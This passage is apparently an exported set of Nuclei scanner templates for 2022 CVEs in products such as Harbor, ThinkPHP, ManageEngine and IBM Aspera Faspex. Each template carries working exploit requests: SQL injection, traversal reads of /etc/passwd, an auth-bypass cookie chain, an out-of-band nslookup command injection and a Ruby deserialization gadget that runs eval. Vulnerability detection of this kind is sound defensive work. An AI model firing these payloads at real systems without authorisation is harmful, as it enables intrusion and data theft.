vendor to fix the XSS vulnerability in the Linear eMerge E3-Series.\n reference:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46381\n - https://github.com/omarhashem123/Security-Research/blob/main/CVE-2022-46381/CVE-2022-46381.txt\n - https://nvd.nist.gov/vuln/detail/CVE-2022-46381\n - https://github.com/amitlttwo/CVE-2022-46381\n - https://github.com/k0mi-tg/CVE-POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-46381\n cwe-id: CWE-79\n epss-score: 0.00099\n epss-percentile: 0.39871\n cpe: cpe:2.3:o:niceforyou:linear_emerge_e3_access_control_firmware:0.32-07e:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: 
niceforyou\n product: linear_emerge_e3_access_control_firmware\n shodan-query: http.html:\"Linear eMerge\"\n tags: cve,cve2022,xss,emerge,linear,niceforyou\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/badging/badge_template_v0.php?layout=1&type=\"/>'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - ''\n - 'Badging Template'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202d49a19c38ab4b9a901abd5e6c90fef4882504cb73444882c2105d186ec64932022100ccca00e7eaba64835c620d5df47e2aad6ee450f81abf2f755260439020d500ce:922c64590222798bb761d5b6d8e72950", "hash": "998f28ca70ad6b2accc06bc71c16a9da", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085d8" }, "name": "CVE-2022-46443.yaml", "content": "id: CVE-2022-46443\n\ninfo:\n name: Bangresto - SQL Injection\n author: Harsh\n severity: high\n description: |\n Bangresto 1.0 is vulnerable to SQL Injection via the itemqty%5B%5D parameter.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire application and underlying database.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://yuyudhn.github.io/CVE-2022-46443/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-46443\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2022-46443\n cwe-id: CWE-89\n epss-score: 0.05592\n epss-percentile: 0.93095\n cpe: cpe:2.3:a:bangresto_project:bangresto:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: bangresto_project\n product: bangresto\n tags: cve,cve2022,bangresto,sqli,bangresto_project\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n POST /bangresto-main/staff/process.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n 
username={{username}}&password={{password}}\n - |\n POST /bangresto-main/staff/insertorder.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded;\n\n itemID[]=1&itemqty[]=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a7a6b71,md5({{num}}),0x7178717a71,0x78))s), 8446744073709551610, 8446744073709551610)))&sentorder=Sent to kitchen\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '{{md5({{num}})}}'\n# digest: 4a0a00473045022100a3a16c285bb2bbd0ca79228c15a194013e67e2f1d1e2429058ff03750383e808022062c6d347e89f8c3a09499dbc165cb56c864338da5d2dd6976f9a776f7dcef0c9:922c64590222798bb761d5b6d8e72950", "hash": "3bd644aecbdb1ae28ee15155ac6a7bd0", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085d9" }, "name": "CVE-2022-46463.yaml", "content": "id: CVE-2022-46463\n\ninfo:\n name: Harbor <=2.5.3 - Unauthorized Access\n author: Arm!tage\n severity: high\n description: |\n An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data stored in Harbor.\n remediation: |\n Upgrade Harbor to a version higher than 2.5.3 to mitigate the vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2022-46463\n - https://github.com/Vad1mo\n - https://github.com/lanqingaa/123/blob/main/README.md\n - https://github.com/lanqingaa/123/tree/bb48caa844d88b0e41e69157f2a2734311abf02d\n - https://github.com/lanqingaa/123\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-46463\n cwe-id: CWE-306\n epss-score: 0.01473\n epss-percentile: 0.86471\n cpe: cpe:2.3:a:linuxfoundation:harbor:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: linuxfoundation\n product: harbor\n shodan-query: http.favicon.hash:657337228\n tags: 
cve,cve2022,harbor,auth-bypass,exposure,linuxfoundation\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/v2.0/search?q=/\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"repository_name\"\n - \"project_name\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ae28ae8282c8eb129103ba15f2fd67f65c28194c70a1af8a99f9fc022671ca82022100b90c66835be66c887739e09bd92a805dd35a406549624e51b00d6219a27c7810:922c64590222798bb761d5b6d8e72950", "hash": "660063c686b72fe726aede1aa48d8c33", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085da" }, "name": "CVE-2022-46888.yaml", "content": "id: CVE-2022-46888\n\ninfo:\n name: NexusPHP <1.7.33 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n NexusPHP before 1.7.33 contains multiple cross-site scripting vulnerabilities via the secret parameter in /login.php; q parameter in /user-ban-log.php; query parameter in /log.php; text parameter in /moresmiles.php; q parameter in myhr.php; or id parameter in /viewrequests.php. 
An attacker can inject arbitrary web script or HTML, which can allow theft of cookie-based authentication credentials and launch of other attacks.\n remediation: |\n Upgrade to NexusPHP version 1.7.33 or later to mitigate this vulnerability.\n reference:\n - https://www.surecloud.com/resources/blog/nexusphp-surecloud-security-review-identifies-authenticated-unauthenticated-vulnerabilities\n - https://github.com/xiaomlove/nexusphp/releases/tag/v1.7.33\n - https://nvd.nist.gov/vuln/detail/CVE-2022-46888\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-46888\n cwe-id: CWE-79\n epss-score: 0.00099\n epss-percentile: 0.40602\n cpe: cpe:2.3:a:nexusphp:nexusphp:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: nexusphp\n product: nexusphp\n shodan-query: http.favicon.hash:-582931176\n tags: cve,cve2022,nexus,php,nexusphp,xss\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/login.php?secret=\">'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'value=\"\">\">'\n - 'NexusPHP'\n case-insensitive: true\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502204866b4c509c48b1775499644d345df8c431567004b38f8674c3938f617ec6cb7022100f594663ec51fd629d1fb0e1dc42018110f37b87bf5cef07e0f83faeaf4b3acc7:922c64590222798bb761d5b6d8e72950", "hash": "7c9898b5d32007dfe55cd6347dd6d9df", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085db" }, "name": "CVE-2022-46934.yaml", "content": "id: CVE-2022-46934\n\ninfo:\n name: kkFileView 4.1.0 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n kkFileView 4.1.0 is susceptible to cross-site scripting via the url parameter at /controller/OnlinePreviewController.java. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. 
This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of kkFileView or apply the necessary security patches provided by the vendor.\n reference:\n - https://github.com/kekingcn/kkFileView/issues/411\n - https://nvd.nist.gov/vuln/detail/CVE-2022-46934\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-46934\n cwe-id: CWE-79\n epss-score: 0.05604\n epss-percentile: 0.92519\n cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: keking\n product: kkfileview\n shodan-query: http.html:\"kkFileView\"\n tags: cve,cve2022,xss,kkfileview,keking\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/picturesPreview?currentUrl=aHR0cDovLyIpO2FsZXJ0KGRvY3VtZW50LmRvbWFpbik7Ly8=&urls\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - document.getElementById(\"http://\");alert(document.domain);//\").click();\n - viewer.min.css\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221008687eab5b9874540b862eebf395db04e1b3280e879a414b6e83b1585e9630e3602210088fa6bef6acacfe1d08604f7b405bda69f1dbf7bd2a1b4fa178d4a2ce1fed6f2:922c64590222798bb761d5b6d8e72950", "hash": "992f3edb9b9b1729a705bdcee61df594", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085dc" }, "name": "CVE-2022-47002.yaml", "content": "id: CVE-2022-47002\n\ninfo:\n name: Masa CMS - Authentication Bypass\n author: iamnoooob,rootxharsh,pdresearch\n severity: critical\n description: |\n Masa CMS 7.2, 7.3, and 7.4-beta are susceptible to authentication bypass in the Remember Me function. 
An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the system.\n remediation: |\n Apply the latest security patch or update provided by the vendor to fix the authentication bypass vulnerability in Masa CMS.\n reference:\n - https://hoyahaxa.blogspot.com/2023/03/authentication-bypass-mura-masa.html\n - https://github.com/MasaCMS/MasaCMS/releases/tag/7.3.10\n - https://hoyahaxa.blogspot.com/2023/01/preliminary-security-advisory.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-47002\n - https://www.hoyahaxa.com/2023/01/preliminary-security-advisory.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-47002\n cwe-id: CWE-863\n epss-score: 0.0395\n epss-percentile: 0.91808\n cpe: cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: masacms\n product: masacms\n shodan-query: 'Generator: Masa CMS'\n tags: cve,cve2022,auth-bypass,cms,masa,masacms\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /admin/?muraAction=cEditProfile.edit HTTP/1.1\n Host: {{Hostname}}\n Cookie: userid={{uuid}}; userhash=\n\n redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - 'contains(body_3,\"\\\"userid\\\"\")'\n condition: and\n\n - type: word\n part: body_3\n words:\n - \"Edit Profile\"\n\n extractors:\n - type: regex\n name: siteid\n group: 1\n regex:\n - 'siteid:\"(.*?)\"'\n internal: true\n part: body\n\n - type: regex\n name: uuid\n group: 1\n regex:\n - '\"lastupdatebyid\":\"([A-F0-9-]+)\"'\n 
internal: true\n part: body\n# digest: 4a0a00473045022100e3097e1250b20cab477464c81fac1ed317a7219c4e7a2c1a708487b21d40dd1d02202a1a5c6c96fb4cb4b010a4a7fc3023d770492fb35b2e1291eca3d007beb48c8d:922c64590222798bb761d5b6d8e72950", "hash": "32a15cc98630998a0b36d4aa8b618965", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085dd" }, "name": "CVE-2022-47003.yaml", "content": "id: CVE-2022-47003\n\ninfo:\n name: Mura CMS <10.0.580 - Authentication Bypass\n author: iamnoooob,rootxharsh,pdresearch\n severity: critical\n description: |\n Mura CMS before 10.0.580 is susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the Mura CMS application.\n remediation: |\n Upgrade Mura CMS to version 10.0.580 or later to mitigate this vulnerability.\n reference:\n - https://hoyahaxa.blogspot.com/2023/03/authentication-bypass-mura-masa.html\n - http://mura.com\n - https://www.murasoftware.com/mura-cms/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-47003\n - https://hoyahaxa.blogspot.com/2023/01/preliminary-security-advisory.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-47003\n cwe-id: CWE-863\n epss-score: 0.02341\n epss-percentile: 0.88676\n cpe: cpe:2.3:a:murasoftware:mura_cms:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: murasoftware\n product: mura_cms\n shodan-query: 'Generator: Mura CMS'\n tags: cve,cve2022,auth-bypass,cms,mura,murasoftware\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1\n Host: 
{{Hostname}}\n - |\n GET /admin/?muraAction=cEditProfile.edit HTTP/1.1\n Host: {{Hostname}}\n Cookie: userid={{uuid}}; userhash=\n\n redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - 'contains(body_3,\"\\\"userid\\\"\")'\n condition: and\n\n - type: word\n part: body_3\n words:\n - \"Edit Profile\"\n\n extractors:\n - type: regex\n name: siteid\n group: 1\n regex:\n - 'siteid:\"(.*?)\"'\n internal: true\n part: body\n\n - type: regex\n name: uuid\n group: 1\n regex:\n - '\"lastupdatebyid\":\"([A-F0-9-]+)\"'\n internal: true\n part: body\n# digest: 490a004630440220440774df54f926d2f453b8d155ef6d625b0cf8b3bd6ae2c520e5bd1f2cd549d80220543f2ab0ffb604510676033c32003ea4f5ad46e6ea52fcd536b79e3eb9d5e4d2:922c64590222798bb761d5b6d8e72950", "hash": "837b4f893a92be4407df6b71f8581860", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085de" }, "name": "CVE-2022-47075.yaml", "content": "id: CVE-2022-47075\n\ninfo:\n name: Smart Office Web 20.28 - Information Disclosure\n author: r3Y3r53\n severity: high\n description: |\n An issue was discovered in Smart Office Web 20.28 and earlier allows attackers to download sensitive information via the action name parameter to ExportEmployeeDetails.aspx, and to ExportReportingManager.aspx.\n reference:\n - https://packetstormsecurity.com/files/173093/Smart-Office-Web-20.28-Information-Disclosure-Insecure-Direct-Object-Reference.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-47075\n - http://packetstormsecurity.com/files/173093/Smart-Office-Web-20.28-Information-Disclosure-Insecure-Direct-Object-Reference.html\n - https://cvewalkthrough.com/smart-office-suite-unauthenticated-data-ex/\n - https://youtu.be/D42upepxzwM\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-47075\n epss-score: 0.00614\n epss-percentile: 0.76423\n cpe: cpe:2.3:a:smartofficepayroll:smartoffice:*:*:*:*:web:*:*:*\n 
metadata:\n verified: true\n max-request: 1\n vendor: smartofficepayroll\n product: smartoffice\n tags: cve,cve2022,packetstorm,smart-office,info,exposure,smartofficepayroll\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ExportReportingManager.aspx\"\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(content_type, \"application/CSV\")'\n - 'contains(body, \"EmployeeName\") && contains(body, \"EmployeeCode\")'\n condition: and\n# digest: 4a0a0047304502210088fd6b3b11c7336d9211442a34460434445fbf2ed05f120310724e4f87057c8202207cd6f25b4bd701c32a7ecab0dfcb2a4c5ee230b2f1a4dba3370b976ea6c289f1:922c64590222798bb761d5b6d8e72950", "hash": "38a02af55cf1b47344511ad341754647", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085df" }, "name": "CVE-2022-47501.yaml", "content": "id: CVE-2022-47501\n\ninfo:\n name: Apache OFBiz < 18.12.07 - Local File Inclusion\n author: your3cho\n severity: high\n description: |\n Arbitrary file reading vulnerability in Apache Software Foundation Apache OFBiz when using the Solr plugin. This is a pre-authentication attack. 
This issue affects Apache OFBiz: before 18.12.07.\n reference:\n - https://lists.apache.org/thread/k8s76l0whydy45bfm4b69vq0mf94p3wc\n - http://www.openwall.com/lists/oss-security/2023/04/18/5\n - https://nvd.nist.gov/vuln/detail/CVE-2022-47501\n - http://www.openwall.com/lists/oss-security/2023/04/18/9\n - http://www.openwall.com/lists/oss-security/2023/04/19/1\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-47501\n cwe-id: CWE-22\n epss-score: 0.12161\n epss-percentile: 0.94898\n cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: apache\n product: ofbiz\n shodan-query: \"html:\\\"OFBiz\\\"\"\n fofa-query: \"app=\\\"Apache_OFBiz\\\"\"\n tags: cve,cve2022,apache,ofbiz,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file://{{path}}\"\n\n payloads:\n path:\n - /etc/passwd\n - c:/windows/win.ini\n\n stop-at-first-match: true\n matchers-condition: or\n matchers:\n - type: dsl\n dsl:\n - \"regex('root:.*:0:0:', body)\"\n - \"status_code == 200\"\n condition: and\n\n - type: dsl\n dsl:\n - \"contains(body, 'bit app support')\"\n - \"contains(body, 'fonts')\"\n - \"contains(body, 'extensions')\"\n - \"status_code == 200\"\n condition: and\n# digest: 4b0a00483046022100d211f452a16960f2a6c0e2a0e03cbb6d4c45711575d380ea3dbd44eb90b3b075022100be606f28dd5f235f36b247b778f2be2bbd3a10ad900979d2d63417e35ce02265:922c64590222798bb761d5b6d8e72950", "hash": "28479182f87e3a91b7dd843cbe704655", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085e0" }, "name": "CVE-2022-47615.yaml", "content": "id: CVE-2022-47615\n\ninfo:\n name: LearnPress Plugin < 4.2.0 - Local File Inclusion\n author: DhiyaneshDK\n severity: critical\n description: |\n Local File Inclusion vulnerability in LearnPress – WordPress LMS Plugin <= 4.1.7.3.2 versions.\n impact: |\n Successful exploitation of this vulnerability 
could lead to unauthorized access to sensitive files, remote code execution, or information disclosure.\n remediation: |\n Upgrade to the latest version of LearnPress Plugin (4.2.0 or higher) to mitigate this vulnerability.\n reference:\n - https://github.com/RandomRobbieBF/CVE-2022-47615/tree/main\n - https://nvd.nist.gov/vuln/detail/CVE-2022-47615\n - https://patchstack.com/database/vulnerability/learnpress/wordpress-learnpress-plugin-4-1-7-3-2-local-file-inclusion?_s_id=cve\n - https://github.com/RandomRobbieBF/CVE-2022-47615\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-47615\n cwe-id: CWE-434\n epss-score: 0.01111\n epss-percentile: 0.84217\n cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: thimpress\n product: learnpress\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/learnpress\"\n tags: cve,cve2022,wp-plugin,wp,wordpress,learnpress,lfi,thimpress\n\nhttp:\n - raw:\n - |\n GET /wp-json/lp/v1/courses/archive-course?template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: word\n part: body\n words:\n - '\"status\":'\n - '\"pagination\":'\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205e9ec553e489d577c4f95c9ab6a58c65d2697e33577bbeb887bdca3fdd7eb11c022100e65fc1ff00cfb250ace1c8561fd251745f59695c763eb6813cdb77a9ea6f7d85:922c64590222798bb761d5b6d8e72950", "hash": "b06eb9b43065726d9c4c28b36a89bba6", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085e1" }, "name": "CVE-2022-47945.yaml", "content": "id: CVE-2022-47945\n\ninfo:\n name: Thinkphp Lang - Local File Inclusion\n author: kagamigawa\n severity: critical\n description: |\n ThinkPHP 
Framework before 6.0.14 allows local file inclusion via the lang parameter when the language pack feature is enabled (lang_switch_on=true). An unauthenticated and remote attacker can exploit this to execute arbitrary operating system commands, as demonstrated by including pearcmd.php.\n impact: |\n This vulnerability can lead to unauthorized access, data leakage, and remote code execution.\n remediation: |\n Apply the latest security patches and updates provided by the Thinkphp framework.\n reference:\n - https://tttang.com/archive/1865/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-47945\n - https://github.com/top-think/framework/compare/v6.0.13...v6.0.14\n - https://github.com/top-think/framework/commit/c4acb8b4001b98a0078eda25840d33e295a7f099\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-47945\n cwe-id: CWE-22\n epss-score: 0.03747\n epss-percentile: 0.90906\n cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: thinkphp\n product: thinkphp\n shodan-query: title:\"Thinkphp\"\n fofa-query: header=\"think_lang\"\n tags: cve,cve2022,thinkphp,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?lang=../../thinkphp/base\"\n - \"{{BaseURL}}/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Call Stack'\n - 'class=\"trace'\n condition: and\n\n - type: status\n status:\n - 500\n# digest: 4b0a00483046022100df8f921b60a2916578e9e578f153d97a1c3480c75e5a814cf8c4871e81a16a36022100f6bb590562d0bc593116e95316cb3160929015320ad42460f32a707e1b56b717:922c64590222798bb761d5b6d8e72950", "hash": "41864c8fb8d293ea19a250d59fb395f5", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085e2" }, "name": "CVE-2022-47966.yaml", "content": "id: CVE-2022-47966\n\ninfo:\n name: ManageEngine - Remote Command 
Execution\n author: rootxharsh,iamnoooob,DhiyaneshDK,pdresearch\n severity: critical\n description: |\n Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix this vulnerability.\n reference:\n - https://twitter.com/horizon3attack/status/1616062915097886732?s=46&t=ER_is9G4FlEebVFQPpnM0Q\n - https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/\n - https://www.manageengine.com/security/advisory/CVE/cve-2022-47966.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-47966\n - http://packetstormsecurity.com/files/170882/Zoho-ManageEngine-ServiceDesk-Plus-14003-Remote-Code-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-47966\n epss-score: 0.97422\n epss-percentile: 0.9993\n cpe: cpe:2.3:a:zohocorp:manageengine_access_manager_plus:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: zohocorp\n product: manageengine_access_manager_plus\n shodan-query: title:\"ManageEngine\"\n tags: cve,cve2022,packetstorm,rce,zoho,manageengine,oast,kev,zohocorp\nvariables:\n cmd: 'nslookup {{interactsh-url}}'\n SAMLResponse: a H7gKuO6t9MbCJZujA9S7WlLFgdqMuNe0145KRwKl000= 
RbBWB6AIP8AN1wTZN6YYCKdnClFoh8GqmU2RXoyjmkr6I0AP371IS7jxSMS2zxFCdZ80kInvgVuaEt3yQmcq33/d6yGeOxZU7kF1f1D/da+oKmEoj4s6PQcvaRFNp+RfOxMECBWVTAxzQiH/OUmoL7kyZUhUwP9G8Yk0tksoV9pSEXUozSq+I5KEN4ehXVjqnIj04mF6Zx6cjPm4hciNMw1UAfANhfq7VC5zj6VaQfz7LrY4GlHoALMMqebNYkEkf2N1kDKiAEKVePSo1vHO0AF++alQRJO47c8kgzld1xy5ECvDc7uYwuDJo3KYk5hQ8NSwvana7KdlJeD62GzPlw== \n\nhttp:\n - raw:\n - |\n POST /SamlResponseServlet HTTP/2\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n SAMLResponse={{url_encode(base64(SAMLResponse))}}&RelayState=\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"dns\"\n\n - type: word\n part: body\n words:\n - \"Unknown error occurred while processing your request\"\n\n - type: status\n status:\n - 500\n# digest: 490a0046304402206656a0fc37b7f0312aac5169982c93b4aac3020a2f6b2467e912d8c9933b6e9d02203bf33f091982581911fac44f49b846db225def97cd5c8621957b4764b3a8dff4:922c64590222798bb761d5b6d8e72950", "hash": "6d55305f77d2c63171f1805106f1a7f9", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085e3" }, "name": "CVE-2022-47986.yaml", "content": "id: CVE-2022-47986\n\ninfo:\n name: IBM Aspera Faspex <=4.4.2 PL1 - Remote Code Execution\n author: coldfish\n severity: critical\n description: |\n IBM Aspera Faspex through 4.4.2 Patch Level 1 is susceptible to remote code execution via a YAML deserialization flaw. This can allow an attacker to send a specially crafted obsolete API call and thereby execute arbitrary code, obtain sensitive data, and/or execute other unauthorized operations.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: The obsolete API call was removed in 4.4.2 PL2. 
This vulnerability can be remediated by upgrading to either 4.4.2 PL2 or 5.x.\n reference:\n - https://blog.assetnote.io/2023/02/02/pre-auth-rce-aspera-faspex/\n - https://www.ibm.com/support/pages/node/6952319\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/243512\n - http://packetstormsecurity.com/files/171772/IBM-Aspera-Faspex-4.4.1-YAML-Deserialization.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-47986\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-47986\n cwe-id: CWE-502\n epss-score: 0.9223\n epss-percentile: 0.98769\n cpe: cpe:2.3:a:ibm:aspera_faspex:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: ibm\n product: aspera_faspex\n shodan-query: html:\"Aspera Faspex\"\n tags: cve,cve2022,ibm,aspera,faspex,kev,packetstorm\n\nhttp:\n - raw:\n - |\n POST /aspera/faspex/package_relay/relay_package HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/json\n\n {\"package_file_list\": [\"/\"], \"external_emails\": \"\\n---\\n- !ruby/object:Gem::Installer\\n i: x\\n- !ruby/object:Gem::SpecFetcher\\n i: y\\n- !ruby/object:Gem::Requirement\\n requirements:\\n !ruby/object:Gem::Package::TarReader\\n io: &1 !ruby/object:Net::BufferedIO\\n io: &1 !ruby/object:Gem::Package::TarReader::Entry\\n read: 0\\n header: \\\"pew\\\"\\n debug_output: &1 !ruby/object:Net::WriteAdapter\\n socket: &1 !ruby/object:PrettyPrint\\n output: !ruby/object:Net::WriteAdapter\\n socket: &1 !ruby/module \\\"Kernel\\\"\\n method_id: :eval\\n newline: \\\"throw `id`\\\"\\n buffer: {}\\n group_stack:\\n - !ruby/object:PrettyPrint::Group\\n break: true\\n method_id: :breakable\\n\", \"package_name\": \"{{rand_base(4)}}\", \"package_note\": \"{{randstr}}\", \"original_sender_name\": \"{{randstr}}\", \"package_uuid\": \"d7cb6601-6db9-43aa-8e6b-dfb4768647ec\", \"metadata_human_readable\": \"Yes\", \"forward\": \"pew\", \"metadata_json\": \"{}\", \"delivery_uuid\": 
